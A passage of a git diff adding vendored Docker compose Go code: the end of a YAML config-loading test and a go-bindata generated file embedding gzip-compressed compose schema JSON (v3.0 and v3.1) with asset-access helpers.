+				Name:     "external-volume",
+				External: true,
+			},
+		},
+		"other-external-volume": {
+			External: types.External{
+				Name:     "my-cool-volume",
+				External: true,
+			},
+		},
+	}
+
+	assert.Equal(t, expectedVolumeConfig, config.Volumes)
+}
+
+func loadYAML(yaml string) (*types.Config, error) {
+	dict, err := ParseYAML([]byte(yaml))
+	if err != nil {
+		return nil, err
+	}
+
+	return Load(buildConfigDetails(dict))
+}
+
+func serviceSort(services []types.ServiceConfig) []types.ServiceConfig {
+	sort.Sort(servicesByName(services))
+	return services
+}
+
+type servicesByName []types.ServiceConfig
+
+func (sbn servicesByName) Len() int           { return len(sbn) }
+func (sbn servicesByName) Swap(i, j int)      { sbn[i], sbn[j] = sbn[j], sbn[i] }
+func (sbn servicesByName) Less(i, j int) bool { return sbn[i].Name < sbn[j].Name }
diff --git a/vendor/github.com/docker/docker/cli/compose/schema/bindata.go b/vendor/github.com/docker/docker/cli/compose/schema/bindata.go
new file mode 100644
index 0000000000..9486e91ae0
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/compose/schema/bindata.go
@@ -0,0 +1,260 @@
+// Code generated by go-bindata.
+// sources:
+// data/config_schema_v3.0.json
+// data/config_schema_v3.1.json
+// DO NOT EDIT!
+
+package schema
+
+import (
+	"bytes"
+	"compress/gzip"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"strings"
+	"time"
+)
+
+func bindataRead(data []byte, name string) ([]byte, error) {
+	gz, err := gzip.NewReader(bytes.NewBuffer(data))
+	if err != nil {
+		return nil, fmt.Errorf("Read %q: %v", name, err)
+	}
+
+	var buf bytes.Buffer
+	_, err = io.Copy(&buf, gz)
+	clErr := gz.Close()
+
+	if err != nil {
+		return nil, fmt.Errorf("Read %q: %v", name, err)
+	}
+	if clErr != nil {
+		return nil, err
+	}
+
+	return buf.Bytes(), nil
+}
+
+type asset struct {
+	bytes []byte
+	info  os.FileInfo
+}
+
+type bindataFileInfo struct {
+	name    string
+	size    int64
+	mode    os.FileMode
+	modTime time.Time
+}
+
+func (fi bindataFileInfo) Name() string {
+	return fi.name
+}
+func (fi bindataFileInfo) Size() int64 {
+	return fi.size
+}
+func (fi bindataFileInfo) Mode() os.FileMode {
+	return fi.mode
+}
+func (fi bindataFileInfo) ModTime() time.Time {
+	return fi.modTime
+}
+func (fi bindataFileInfo) IsDir() bool {
+	return false
+}
+func (fi bindataFileInfo) Sys() interface{} {
+	return nil
+}
+
+var _dataConfig_schema_v30Json = []byte("\x1f\x8b\x08\x00\x00\x09\x6e\x88\x00\xff\xec\x5a\x4f\x8f\xdb\xb8\x0e\xbf\xe7\x53\x18\x6e\x6f\xcd\xcc\x14\x78\xc5\x03\x5e\x6f\xef\xb8\xa7\xdd\xf3\x0e\x5c\x43\xb1\x99\x44\x1d\x59\x52\x29\x39\x9d\xb4\xc8\x77\x5f\xc8\xff\x22\x2b\x92\xe5\x24\xee\xb6\x87\x9e\x66\x62\x91\x14\xff\xe9\x47\x8a\xf6\xf7\x55\x92\xa4\x6f\x55\xb1\x87\x8a\xa4\x1f\x93\x74\xaf\xb5\xfc\xf8\xf4\xf4\x59\x09\xfe\xd0\x3e\x7d\x14\xb8\x7b\x2a\x91\x6c\xf5\xc3\xfb\x0f\x4f\xed\xb3\x37\xe9\xda\xf0\xd1\xd2\xb0\x14\x82\x6f\xe9\x2e\x6f\x57\xf2\xc3\x7f\x1e\xdf\x3f\x1a\xf6\x96\x44\x1f\x25\x18\x22\xb1\xf9\x0c\x85\x6e\x9f\x21\x7c\xa9\x29\x82\x61\x7e\x4e\x0f\x80\x8a\x0a\x9e\x66\xeb\x95\x59\x93\x28\x24\xa0\xa6\xa0\xd2\x8f\x89\x51\x2e\x49\x06\x92\xfe\x81\x25\x56\x69\xa4\x7c\x97\x36\x8f\x4f\x8d\x84\x24\x49\x15\xe0\x81\x16\x96\x84\x41\xd5\x37\x4f\x67\xf9\x4f\x03\xd9\xda\x95\x6a\x29\xdb\x3c\x97\x44\x6b\x40\xfe\xd7\xa5\x6e\xcd\xf2\xa7\x67\xf2\xf0\xed\xff\x0f\x7f\xbf\x7f\xf8\xdf\x63\xfe\x90\xbd\x7b\x3b\x5a\x36\xfe\x45\xd8\xb6\xdb\x97\xb0\xa5\x9c\x6a\x2a\xf8\xb0\x7f\x3a\x50\x9e\xba\xff\x4e\xc3\xc6\xa4\x2c\x1b\x62\xc2\x46\x7b\x6f\x09\x53\x30\xb6\x99\x83\xfe\x2a\xf0\x25\x66\xf3\x40\xf6\x93\x6c\xee\xf6\xf7\xd8\x3c\x36\xe7\x20\x58\x5d\x45\x23\xd8\x53\xfd\x24\x63\xda\xed\xef\x8b\xdf\xaa\x37\x7a\x92\xb6\xa5\xb0\xf6\x6e\x14\x1c\x65\xbb\xcf\x55\xbe\x6c\x0b\xfb\x6a\x70\x56\xc0\x4b\x25\x48\x26\x8e\xe6\x59\xc0\x1f\x2d\x41\x05\x5c\xa7\x83\x0b\x92\x24\xdd\xd4\x94\x95\xae\x47\x05\x87\x3f\x8d\x88\x67\xeb\x61\x92\x7c\x77\x0f\xb6\x25\xa7\x59\x1f\xfd\x0a\x07\x7c\x58\x0f\xd8\x32\xac\x17\x82\x6b\x78\xd5\x8d\x51\xd3\x5b\xb7\x2e\x10\xc5\x0b\xe0\x96\x32\x98\xcb\x41\x70\xa7\x26\x5c\xc6\xa8\xd2\xb9\xc0\xbc\xa4\x85\x4e\x4f\x0e\xfb\x85\xbc\x78\x3e\x0d\xac\xd6\xaf\x6c\xe5\x11\x98\x16\x44\xe6\xa4\x2c\x47\x76\x10\x44\x72\x4c\xd7\x49\x4a\x35\x54\xca\x6f\x62\x92\xd6\x9c\x7e\xa9\xe1\x8f\x8e\x44\x63\x0d\xae\xdc\x12\x85\x5c\x5e\xf0\x0e\x45\x2d\x73\x49\xd0\x24\xd8\xb4\xfb\xd3\x42\x54\x15\xe1\x4b\x65\xdd\x35\x76\xcc\xf0\xbc\xe0\x9a\x50\x0e\x98\x73\x52\xc5\x12\xc9\x9c\x3a\xe0\xa5\xca\xdb\xfa\x37\x99\x46\xdb\xbc\xe5\x57\x8e\x80\xa1\x18\x2e\x1a\x8f\x92\x4f\x25\x76\x2b\xc6\xa4\xb6\xd1\x2d\x75\x18\x73\x05\x04\x8b\xfd\x8d\xfc\xa2\x22\x94\xcf\xf1\x1d\x70\x8d\x47\x29\x68\x9b\x2f\xbf\x5c\x22\x00\x3f\xe4\x03\x96\x5c\xed\x06\xe0\x07\x8a\x82\x57\xfd\x69\x98\x03\x30\x03\xc8\x1b\xfe\x57\x29\x14\xb8\x8e\x71\x0c\xb4\x97\x06\x53\x47\x3e\xe9\x39\x9e\x7b\xc3\xd7\x49\xca\xeb\x6a\x03\x68\x5a\xba\x11\xe5\x56\x60\x45\x8c\xb2\xfd\xde\xd6\xf2\xc8\xd3\x9e\xcc\xb3\x1d\x68\xdb\x60\xca\x3a\x61\x39\xa3\xfc\x65\xf9\x14\x87\x57\x8d\x24\xdf\x0b\xa5\xe7\x63\xb8\xc5\xbe\x07\xc2\xf4\xbe\xd8\x43\xf1\x32\xc1\x6e\x53\x8d\xb8\x85\xd2\x73\x92\x9c\x56\x64\x17\x27\x92\x45\x8c\x84\x91\x0d\xb0\x9b\xec\x5c\xd4\xf9\x96\x58\xb1\xdb\x19\xd2\x50\xc6\x5d\x74\x2e\xdd\x72\xac\xe6\x97\x48\x0f\x80\x73\x0b\xb8\x90\xe7\x86\xcb\x5d\x8c\x37\x20\x49\xbc\xfb\x1c\x91\x7e\x7a\x6c\x9b\xcf\x89\x53\xd5\xfc\xc7\x58\x9a\xb9\xed\x42\xe2\xd4\x7d\xdf\x13\xc7\xc2\x79\x0d\xc5\x28\x2a\x15\x29\x4c\xdf\x80\xa0\x02\x71\x3d\x93\x76\xcd\x7e\x5e\x89\x32\x94\xa0\x17\xc4\xae\x6f\x82\x48\x7d\x75\x21\x4c\x6e\xea\x1f\x67\x85\x2e\x7a\x81\x88\x58\x13\x52\x6f\xae\x9a\x67\x75\xe3\x29\xd6\xd0\x11\x46\x89\x82\xf8\x61\x0f\x3a\x72\x24\x8d\xca\xc3\x87\x99\x39\xe1\xe3\xfd\xef\x24\x6f\x80\x35\x28\x73\x7e\x8f\x1c\x11\x75\x56\xa5\x39\x6e\x3e\x45\xb2\xc8\x69\xfb\xc1\x2d\xbc\xa4\x65\x18\x2b\x1a\x84\xb0\x0f\x98\x14\xa8\x2f\x4e\xd7\xbf\x53\xee\xdb\xad\xef\xae\xf6\x12\xe9\x81\x32\xd8\xc1\xf8\xd6\xb2\x11\x82\x01\xe1\x23\xe8\x41\x20\x65\x2e\x38\x3b\xce\xa0\x54\x9a\x60\xf4\x42\xa1\xa0\xa8\x91\xea\x63\x2e\xa4\x5e\xbc\xcf\x50\xfb\x2a\x57\xf4\x1b\x8c\xa3\x79\xc6\xfb\x4e\x50\x36\xe2\x39\xaa\x42\xdf\x56\xaf\x95\x2e\x29\xcf\x85\x04\x1e\xf5\x8e\xd2\x42\xe6\x3b\x24\x05\xe4\x12\x90\x8a\xd2\x67\xe0\xda\x8e\x75\x59\x23\x31\xfb\x5f\x8a\x51\x74\xc7\x09\x8b\x39\x5a\x57\x72\x7b\xe3\xc5\x42\xeb\x78\xb8\x6b\x46\x2b\x1a\x3e\x07\x1e\x80\x9d\x51\x03\x5a\xfc\xf7\xc3\xfe\x04\xe4\x9f\x35\xa5\x5c\xc3\x0e\xd0\x87\x94\x13\x5d\xc7\x74\xd3\x31\xa3\xdb\xd8\x13\x1c\x07\x74\x42\x8f\x86\x41\x89\xad\xf6\x33\xf8\x7a\x11\xaf\x5e\xa3\xe1\x6f\x23\x6f\xdd\x29\x92\x79\xe9\xaf\x82\x73\x57\x8d\x2c\x88\xa8\x27\x2f\xa2\xd6\x2a\xda\x18\x36\x34\x5c\x4d\x35\x35\x03\xa9\x35\xc5\x5c\x14\x2f\x4c\xa3\x64\x0e\x41\x49\xfd\xda\xae\x1c\xcb\xae\x98\x23\x3b\x77\x96\x5e\x80\x6f\xa2\x68\x93\x46\x27\xb0\xd3\xd3\xcd\x8e\x28\x38\x79\xa4\x8a\x6c\x9c\x99\x9b\xef\x70\x9b\x6c\xc4\x43\x1c\x63\x10\x34\x52\x27\x2e\x1d\xda\x8e\xf0\x04\xd4\xaf\x39\x38\xd0\xb4\x02\x51\xfb\x6b\xd6\xca\xce\xef\x8e\x29\xb5\x26\xb3\x91\xa0\x5a\x94\x6e\x4c\x9f\x87\xa0\xf6\xfd\x45\x34\x70\x73\x0e\x09\x82\x64\xb4\x20\x2a\x06\x44\x77\x5c\x50\x6b\x59\x12\x0d\x79\xfb\xa2\xea\x2a\xe8\x9f\xc0\x7c\x49\x90\x30\x06\x8c\xaa\x6a\x0e\x86\xa6\x25\x30\x72\xbc\xa9\x7c\x36\xec\x5b\x42\x59\x8d\x90\x93\x42\x77\xef\xc2\x22\x39\x97\x56\x82\x53\x2d\xbc\x08\x31\x6f\xcb\x8a\xbc\xe6\xfd\xb6\x0d\x89\xf7\xc0\x04\xdb\xba\xb9\x77\x4b\x2b\x13\x94\xa8\xb1\xb8\x70\xf6\xcd\x21\x3a\xd7\xfa\x40\xc6\xf4\x3b\x5e\x98\x8e\xa0\x0c\x92\x0c\x57\xff\x28\x7f\xb4\xb4\x74\x7d\x66\x2e\x05\xa3\xc5\x71\x29\x0b\x0b\xc1\x5b\x27\xcf\x49\x88\x3b\x33\xd0\xa4\x83\x69\x85\x2a\xa9\xa3\x87\xb5\x61\xf8\x4a\x79\x29\xbe\x5e\xb1\xe1\x72\xa9\x24\x19\x29\xc0\xc1\xbb\x7b\x1d\xad\x34\x12\xca\xf5\xd5\xe5\xfc\x5e\xb3\xee\xa8\xe6\x43\x7e\x46\x50\x7f\xa0\x8b\xbf\x49\x0d\x20\x7d\x21\xeb\xe8\x3c\xa8\x82\x4a\xa0\x37\x01\x17\x78\xf3\x1d\x33\xb1\x27\x5b\xa0\xaa\xcd\x1a\x20\x76\x54\xe6\xbe\xb8\xf8\x6d\x23\x3e\x24\xcc\xe2\x80\x44\x25\xa9\x96\x3a\x1d\xb3\x47\xaa\xa9\xb7\x06\x27\xd3\xa3\x88\x24\x3c\x8e\x88\x69\x1d\xd7\xbd\xa3\x50\xf5\x86\xc3\x64\x47\x65\xf9\xd3\xf7\x9e\x77\xfe\x35\xe5\x14\xbe\x94\xdc\x07\x7a\xfd\xdb\x90\x40\x54\x9f\x87\x9e\x79\x3d\xf8\x2a\x9b\x1d\xe2\xe0\xab\x88\xe5\xf4\xbf\xb2\xc1\xbb\x03\x33\xba\x2f\x37\x22\x90\xd1\x51\xfd\x46\x8c\xdf\xf9\x75\x65\x7e\x39\x43\x2a\x2b\xcf\x2e\xef\x8f\x53\x29\x31\x7b\x3a\xdf\x71\x64\x63\x35\x5c\x32\xcf\x07\x74\x63\xb4\x9d\x1a\x4a\xf4\x24\x81\x69\xad\xb3\x69\xe7\xc4\x69\xcb\x17\xcc\xf0\xc7\x77\x13\x35\x65\xea\x2d\xda\x0f\x02\xe3\x05\x06\x3e\xfe\x98\x3a\x8d\x68\xef\xdd\xcb\xaf\xc0\x02\xa0\x66\xf1\x5f\x7c\x13\x66\xec\xe4\xc7\x8b\xf9\xc6\xf7\xf1\xd0\xae\xfd\x9e\x2b\x1b\xf9\xc7\x21\x69\xdf\x49\x5b\x90\x92\xd9\xbd\x79\x28\x8c\xde\x2f\xc5\xdc\x91\x61\xff\xc5\x56\xe6\x87\xab\x95\xfd\xb7\xf9\xba\x6e\x75\x5a\xfd\x13\x00\x00\xff\xff\x46\xf7\x7b\x23\xe5\x2a\x00\x00")
+
+func dataConfig_schema_v30JsonBytes() ([]byte, error) {
+	return bindataRead(
+		_dataConfig_schema_v30Json,
+		"data/config_schema_v3.0.json",
+	)
+}
+
+func dataConfig_schema_v30Json() (*asset, error) {
+	bytes, err := dataConfig_schema_v30JsonBytes()
+	if err != nil {
+		return nil, err
+	}
+
+	info := bindataFileInfo{name: "data/config_schema_v3.0.json", size: 0, mode: os.FileMode(0), modTime: time.Unix(0, 0)}
+	a := &asset{bytes: bytes, info: info}
+	return a, nil
+}
+
+var _dataConfig_schema_v31Json = []byte("\x1f\x8b\x08\x00\x00\x09\x6e\x88\x00\xff\xec\x1a\xcb\x8e\xdb\x36\xf0\xee\xaf\x10\x94\xdc\xe2\xdd\x4d\xd1\xa0\x40\x73\xeb\xb1\xa7\xf6\xdc\x85\x23\xd0\xd2\x58\x66\x96\x22\x19\x92\x72\xd6\x09\xfc\xef\x05\xf5\x32\x45\x91\x22\x6d\x2b\xd9\x45\xd1\xd3\xae\xc5\x99\xe1\xbc\x67\x38\xe4\xf7\x55\x92\xa4\x6f\x65\xbe\x87\x0a\xa5\x1f\x93\x74\xaf\x14\xff\xf8\xf0\xf0\x59\x32\x7a\xd7\x7e\xbd\x67\xa2\x7c\x28\x04\xda\xa9\xbb\xf7\x1f\x1e\xda\x6f\x6f\xd2\xb5\xc6\xc3\x85\x46\xc9\x19\xdd\xe1\x32\x6b\x57\xb2\xc3\xaf\xf7\xbf\xdc\x6b\xf4\x16\x44\x1d\x39\x68\x20\xb6\xfd\x0c\xb9\x6a\xbf\x09\xf8\x52\x63\x01\x1a\xf9\x31\x3d\x80\x90\x98\xd1\x74\xb3\x5e\xe9\x35\x2e\x18\x07\xa1\x30\xc8\xf4\x63\xa2\x99\x4b\x92\x01\xa4\xff\x60\x90\x95\x4a\x60\x5a\xa6\xcd\xe7\x53\x43\x21\x49\x52\x09\xe2\x80\x73\x83\xc2\xc0\xea\x9b\x87\x33\xfd\x87\x01\x6c\x6d\x53\x35\x98\x6d\xbe\x73\xa4\x14\x08\xfa\xf7\x94\xb7\x66\xf9\xd3\x23\xba\xfb\xf6\xc7\xdd\x3f\xef\xef\x7e\xbf\xcf\xee\x36\xef\xde\x8e\x96\xb5\x7e\x05\xec\xda\xed\x0b\xd8\x61\x8a\x15\x66\x74\xd8\x3f\x1d\x20\x4f\xdd\x7f\xa7\x61\x63\x54\x14\x0d\x30\x22\xa3\xbd\x77\x88\x48\x18\xcb\x4c\x41\x7d\x65\xe2\x29\x24\xf3\x00\xf6\x42\x32\x77\xfb\x3b\x64\x1e\x8b\x73\x60\xa4\xae\x82\x16\xec\xa1\x5e\x48\x98\x76\xfb\x65\xec\x27\x21\x17\xa0\xc2\x2e\xdb\x42\xbd\x98\xc7\xea\xed\x6f\x13\x78\xd5\x0b\x3d\x0b\xdb\x42\x18\x7b\x37\x0c\x8e\xc2\xdb\xa5\x2a\x57\x78\xf9\x75\x35\x28\xcb\xa3\xa5\x02\x38\x61\x47\xfd\xcd\xa3\x8f\x16\xa0\x02\xaa\xd2\x41\x05\x49\x92\x6e\x6b\x4c\x0a\x5b\xa3\x8c\xc2\x5f\x9a\xc4\xa3\xf1\x31\x49\xbe\xdb\x99\xcc\xa0\xd3\xac\x8f\x7e\xf9\x0d\x3e\xac\x7b\x64\x19\xd6\x73\x46\x15\x3c\xab\x46\xa8\xf9\xad\x5b\x15\xb0\xfc\x09\xc4\x0e\x13\x88\xc5\x40\xa2\x94\x33\x2a\x23\x58\xaa\x8c\x89\xac\xc0\xb9\x4a\x4f\x16\xfa\x84\x5e\xd8\x9f\x06\x54\xe3\xd7\x66\xe5\x20\x98\xe6\x88\x67\xa8\x28\x46\x72\x20\x21\xd0\x31\x5d\x27\x29\x56\x50\x49\xb7\x88\x49\x5a\x53\xfc\xa5\x86\x3f\x3b\x10\x25\x6a\xb0\xe9\x16\x82\xf1\xe5\x09\x97\x82\xd5\x3c\xe3\x48\x68\x07\x9b\x57\x7f\x9a\xb3\xaa\x42\x74\x29\xaf\xbb\x44\x8e\x08\xcd\x33\xaa\x10\xa6\x20\x32\x8a\xaa\x90\x23\xe9\xa8\x03\x5a\xc8\xac\x2d\xf8\xb3\x6e\xb4\xcb\x5a\x7c\x69\x11\x18\xaa\xff\xa2\xf6\x28\xe8\x9c\x63\xb7\x64\xb4\x6b\x6b\xde\x52\x0b\x31\x93\x80\x44\xbe\xbf\x12\x9f\x55\x08\xd3\x18\xdd\x01\x55\xe2\xc8\x19\x6e\xfd\xe5\xd5\x39\x02\xd0\x43\x36\xe4\x92\x8b\xd5\x00\xf4\x80\x05\xa3\x55\x1f\x0d\x31\x09\x66\x48\xf2\x1a\xff\x99\x33\x09\xb6\x62\x2c\x01\xcd\xa5\x41\xd4\x91\x4e\x7a\x8c\xc7\x5e\xf0\x75\x92\xd2\xba\xda\x82\xd0\x3d\xec\x08\x72\xc7\x44\x85\x34\xb3\xfd\xde\xc6\xf2\x48\xd3\x0e\xcf\x33\x15\x68\xca\xa0\xcb\x3a\x22\x19\xc1\xf4\x69\x79\x17\x87\x67\x25\x50\xb6\x67\x52\xc5\xe7\x70\x03\x7d\x0f\x88\xa8\x7d\xbe\x87\xfc\x69\x06\xdd\x84\x1a\x61\x33\xa9\x62\x9c\x1c\x57\xa8\x0c\x03\xf1\x3c\x04\x42\xd0\x16\xc8\x55\x72\x2e\xaa\x7c\x83\x2c\x2b\x4b\x0d\xea\xf3\xb8\x49\xe7\xd2\x2d\x87\x6a\x7e\x21\xf0\x01\x44\x6c\x01\x67\xfc\xdc\x70\xd9\x8b\xe1\x06\x24\x09\x77\x9f\x23\xd0\x4f\xf7\x6d\xf3\x39\x13\x55\xcd\x7f\x84\xa4\x1b\xbb\x5d\x48\xac\xba\xef\xfa\x62\x49\x18\xd7\x50\x8c\xac\x52\xa1\x5c\xf7\x0d\x02\xa4\xc7\xae\x67\xd0\xee\x74\x93\x55\xac\xf0\x39\xe8\x04\xd8\xd6\x8d\x37\x53\x5f\x5c\x08\x93\xab\xfa\xc7\x28\xd3\x05\x0f\x10\x01\x69\x7c\xec\xc5\xb2\x79\x66\x37\xec\x62\x0d\x1c\x22\x18\x49\x08\x07\xbb\x57\x91\x23\x6a\x98\x1f\x3e\x44\xfa\x84\x0b\xf7\xb7\x59\x5c\x0f\xaa\x97\x66\x7c\x8f\x1c\x20\x75\x66\xa5\x09\x37\x17\x23\x9b\x40\xb4\xfd\xe0\x16\x9e\xe3\xc2\x9f\x2b\x9a\x0c\x61\x06\x18\x67\x42\x4d\xa2\xeb\xe7\x94\xfb\x76\xeb\x9b\xab\x3d\x17\xf8\x80\x09\x94\x30\x3e\xb5\x6c\x19\x23\x80\xe8\x28\xf5\x08\x40\x45\xc6\x28\x39\x46\x40\x4a\x85\x44\xf0\x40\x21\x21\xaf\x05\x56\xc7\x8c\x71\xb5\x78\x9f\x21\xf7\x55\x26\xf1\x37\x18\x5b\xf3\x9c\xef\x3b\x42\x1b\x8b\x21\x6b\x42\x72\xa5\x41\x7d\x29\x29\x1c\xc6\x8e\x44\x18\x4c\x54\xe1\x14\x95\x4a\x56\x8b\x3c\xf6\x80\xad\xf7\x44\xa2\x84\xd8\x23\xbc\x76\xb7\x71\xd8\xcc\x03\x97\x97\x00\x4f\x0a\x5d\x67\xc2\x50\x55\xb6\x7f\x9b\x79\xe5\xe4\x0c\x7d\x79\x94\xb9\xba\xae\x5b\x93\xaa\xc0\x34\x63\x1c\x68\x30\x36\xa4\x62\x3c\x2b\x05\xca\x21\xe3\x20\x30\x73\xaa\x62\x6d\x46\x7a\x51\x0b\xa4\xf7\x9f\x92\x91\xb8\xa4\x88\x84\xc2\x4c\x55\x7c\x77\xe5\xb1\x52\xa9\x70\xb0\xd7\x04\x57\xd8\x1f\x34\x0e\xaf\x8d\xe8\x00\xda\xea\xef\x2e\xfa\x33\x05\xff\xcc\x29\xa6\x0a\x4a\xed\x26\x53\xa7\x9a\xe9\x39\xe7\x5b\xce\x88\x5e\x73\x8f\xc4\xd8\xa0\x33\x7c\x24\x6d\x60\xee\x94\x1b\xc1\xd5\x89\x3a\xf9\x1a\xdd\x75\x34\xf4\xd6\x1d\x23\x1b\x27\xfc\x45\xc5\xdc\x66\x63\xe3\xad\xa7\xee\xa0\xaa\x65\xf0\x58\xd0\xc0\x50\x39\xd7\xd2\x0e\xa0\xc6\xd0\x7e\xd1\x6a\xa1\xdb\x64\x1d\x04\x05\x76\x73\xbb\xb2\x24\xbb\x60\xec\x6e\x9d\x58\x7b\x02\xae\x79\xb2\x09\x1a\x9c\xbf\xcf\xcf\xb6\x3b\x20\xef\xdc\x19\x4b\xb4\xb5\x26\xae\xae\xe0\xd6\xde\x28\x0e\xe1\x1c\x23\x40\x09\x6c\xd9\xa5\x4f\xd4\x66\x3e\x01\xf9\x3a\xc7\x46\x0a\x57\xc0\x6a\x77\xc1\x5b\x99\xfe\xdd\x21\xa5\xc6\x5c\x3e\x60\x54\x03\xd2\xb6\xe9\xe3\x60\xd4\xbe\xbb\x0c\x1a\x2e\x26\x48\x04\x70\x82\x73\x24\x43\x89\xe8\x86\xf1\x44\xcd\x0b\xa4\x20\x6b\xef\x65\x2f\x4a\xfd\x33\x39\x9f\x23\x81\x08\x01\x82\x65\x15\x93\x43\xd3\x02\x08\x3a\x5e\x55\x3e\x1b\xf4\x1d\xc2\xa4\x16\x90\xa1\x5c\x75\x57\xbf\x01\x9f\x4b\x2b\x46\xb1\x62\xce\x0c\x11\xb7\x65\x85\x9e\xb3\x7e\xdb\x06\x24\xd4\xd9\x8c\x9b\xfa\xd8\xc9\x82\xe1\x09\x6d\xe3\x77\x59\x75\x9e\x31\xd1\xb9\xd6\x7b\x3c\xa6\xdf\x71\x22\xba\x00\xa9\x33\xc9\x30\xf8\x09\xe2\x07\x4b\x4b\x77\xca\xc8\x38\x23\x38\x3f\x2e\x25\x61\xce\x68\xab\xe4\x18\x87\xb8\xd1\x03\xb5\x3b\xe8\x56\xa8\xe2\x2a\x18\xac\x0d\xc2\x57\x4c\x0b\xf6\xf5\x82\x0d\x97\x73\x25\x4e\x50\x0e\x56\xbe\xbb\x55\xd1\x52\x09\x84\xa9\xba\xb8\x9c\xdf\x2a\xd6\x0d\xd5\x7c\xf0\xcf\x40\xd6\x1f\xe0\xc2\xf7\xe8\x9e\x4c\x9f\xf3\x3a\x38\x0d\xac\xa0\x62\xc2\xe9\x80\x0b\x3c\xf4\x08\x89\xd8\x83\x2d\x50\xd5\xa2\xc6\xc7\x1d\x54\xc6\xf8\xf2\xa7\x8d\xf0\x88\x78\x13\x4e\x48\x98\xa3\x6a\xa9\xe8\x88\x1e\xa8\xa7\xce\x1a\x9c\xcc\xcf\x2d\x12\xff\xec\x22\xc4\x75\x98\xf7\x0e\x42\xd6\x5b\xea\x19\x21\x4c\x4f\x19\xae\x5b\xfe\xf8\x63\xca\xc9\x7f\x28\xb9\x2d\xe9\xf5\x77\x61\x1e\xab\x3e\x0e\x3d\xf3\x7a\xd0\xd5\x26\xda\xc4\xde\x8b\xa8\xe5\xf8\x6f\xda\x77\x7b\x44\xe0\xea\xf3\x2f\xec\x04\x6f\x48\x2e\xdd\x8b\xa6\x40\x6e\xe9\xa0\xfe\x4f\x2d\xff\x11\x47\xfc\x79\xfe\xd5\x3d\x20\x0b\xbe\xdc\x6a\xa0\xae\x2e\xce\x11\xcf\x95\x5e\x81\xcd\x5e\xda\x14\xe3\xc1\xa2\x61\x92\xe9\x99\x7f\x4e\x93\xd1\xf7\x69\x1d\xc6\x66\xcc\x86\x0d\xe6\x78\xe3\x3b\xae\x90\x73\x83\xa4\x1e\xc4\x73\xbf\x62\x6d\xda\x29\x71\x5e\xf2\x05\x93\xcd\xfd\xbb\x99\x3e\x60\xee\xde\xfb\x07\x15\xd0\x05\x86\x74\x6e\x9b\x5a\x87\x87\x5e\xbb\xd3\x77\x9b\x9e\xf8\x37\xf0\x27\xaf\x38\xb5\x9c\xf4\x38\x99\x49\x7d\x1f\x0f\x5a\xdb\x17\x98\x9b\x91\x7e\x2c\x90\xf6\x15\x89\x91\xdd\x37\xe6\x79\xca\x67\x46\xe7\xdb\x4e\x7b\xcc\xdb\xbf\xb1\xf4\xdc\x6a\xac\xcc\xbf\xcd\x7b\xd8\xd5\x69\xf5\x6f\x00\x00\x00\xff\xff\xfc\xf3\x11\x6a\x88\x2f\x00\x00")
+
+func dataConfig_schema_v31JsonBytes() ([]byte, error) {
+	return bindataRead(
+		_dataConfig_schema_v31Json,
+		"data/config_schema_v3.1.json",
+	)
+}
+
+func dataConfig_schema_v31Json() (*asset, error) {
+	bytes, err := dataConfig_schema_v31JsonBytes()
+	if err != nil {
+		return nil, err
+	}
+
+	info := bindataFileInfo{name: "data/config_schema_v3.1.json", size: 0, mode: os.FileMode(0), modTime: time.Unix(0, 0)}
+	a := &asset{bytes: bytes, info: info}
+	return a, nil
+}
+
+// Asset loads and returns the asset for the given name.
+// It returns an error if the asset could not be found or
+// could not be loaded.
+func Asset(name string) ([]byte, error) {
+	cannonicalName := strings.Replace(name, "\\", "/", -1)
+	if f, ok := _bindata[cannonicalName]; ok {
+		a, err := f()
+		if err != nil {
+			return nil, fmt.Errorf("Asset %s can't read by error: %v", name, err)
+		}
+		return a.bytes, nil
+	}
+	return nil, fmt.Errorf("Asset %s not found", name)
+}
+
+// MustAsset is like Asset but panics when Asset would return an error.
+// It simplifies safe initialization of global variables.
+func MustAsset(name string) []byte {
+	a, err := Asset(name)
+	if err != nil {
+		panic("asset: Asset(" + name + "): " + err.Error())
+	}
+
+	return a
+}
+
+// AssetInfo loads and returns the asset info for the given name.
+// It returns an error if the asset could not be found or
+// could not be loaded.
+func AssetInfo(name string) (os.FileInfo, error) {
+	cannonicalName := strings.Replace(name, "\\", "/", -1)
+	if f, ok := _bindata[cannonicalName]; ok {
+		a, err := f()
+		if err != nil {
+			return nil, fmt.Errorf("AssetInfo %s can't read by error: %v", name, err)
+		}
+		return a.info, nil
+	}
+	return nil, fmt.Errorf("AssetInfo %s not found", name)
+}
+
+// AssetNames returns the names of the assets.
+func AssetNames() []string {
+	names := make([]string, 0, len(_bindata))
+	for name := range _bindata {
+		names = append(names, name)
+	}
+	return names
+}
+
+// _bindata is a table, holding each asset generator, mapped to its name.
+var _bindata = map[string]func() (*asset, error){
+	"data/config_schema_v3.0.json": dataConfig_schema_v30Json,
+	"data/config_schema_v3.1.json": dataConfig_schema_v31Json,
+}
+
+// AssetDir returns the file names below a certain
+// directory embedded in the file by go-bindata.
+// For example if you run go-bindata on data/... and data contains the
+// following hierarchy:
+//     data/
+//       foo.txt
+//       img/
+//         a.png
+//         b.png
+// then AssetDir("data") would return []string{"foo.txt", "img"}
+// AssetDir("data/img") would return []string{"a.png", "b.png"}
+// AssetDir("foo.txt") and AssetDir("notexist") would return an error
+// AssetDir("") will return []string{"data"}.
+func AssetDir(name string) ([]string, error) {
+	node := _bintree
+	if len(name) != 0 {
+		cannonicalName := strings.Replace(name, "\\", "/", -1)
+		pathList := strings.Split(cannonicalName, "/")
+		for _, p := range pathList {
+			node = node.Children[p]
+			if node == nil {
+				return nil, fmt.Errorf("Asset %s not found", name)
+			}
+		}
+	}
+	if node.Func != nil {
+		return nil, fmt.Errorf("Asset %s not found", name)
+	}
+	rv := make([]string, 0, len(node.Children))
+	for childName := range node.Children {
+		rv = append(rv, childName)
+	}
+	return rv, nil
+}
+
+type bintree struct {
+	Func     func() (*asset, error)
+	Children map[string]*bintree
+}
+var _bintree = &bintree{nil, map[string]*bintree{
+	"data": &bintree{nil, map[string]*bintree{
+		"config_schema_v3.0.json": &bintree{dataConfig_schema_v30Json, map[string]*bintree{}},
+		"config_schema_v3.1.json": &bintree{dataConfig_schema_v31Json, map[string]*bintree{}},
+	}},
+}}
+
+// RestoreAsset restores an asset under the given directory
+func RestoreAsset(dir, name string) error {
+	data, err := Asset(name)
+	if err != nil {
+		return err
+	}
+	info, err := AssetInfo(name)
+	if err != nil {
+		return err
+	}
